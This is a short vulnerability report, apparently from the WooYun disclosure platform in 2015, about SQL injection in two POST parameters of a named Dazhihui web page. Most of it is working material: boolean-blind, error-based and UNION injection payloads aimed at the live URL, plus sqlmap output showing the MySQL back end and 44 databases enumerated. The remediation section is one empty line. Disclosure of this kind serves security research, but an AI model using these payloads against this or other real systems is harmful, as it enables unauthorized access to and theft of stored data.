SQL injection on a 大智慧 (Dazhihui) site affecting 44 databases

2015-04-07 10:50

Affected URL: http://dts.gw.com.cn/outlets.php



POST request body:

area_selet1=0&area_selet2=0

Both parameters are injectable.

Proof of vulnerability:

Place: POST
Parameter: area_selet1
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: area_selet1=0' RLIKE IF(1889=1889,0,0x28) AND 'ajCw'='ajCw&area_selet2=0

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: area_selet1=0' AND (SELECT 4202 FROM(SELECT COUNT(*),CONCAT(0x3a716f783a,(SELECT (CASE WHEN (4202=4202) THEN 1 ELSE 0 END)),0x3a6d75683a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'tjfe'='tjfe&area_selet2=0

    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: area_selet1=0' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x3a716f783a,0x476a594b666459495448,0x3a6d75683a),NULL#&area_selet2=0
---
[09:21:49] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL 5.0
[09:21:49] [INFO] fetching database names
available databases [44]:


Fix:

As the title says.

Source: www.wooyun.org/bugs/wooyun-2015-0106147
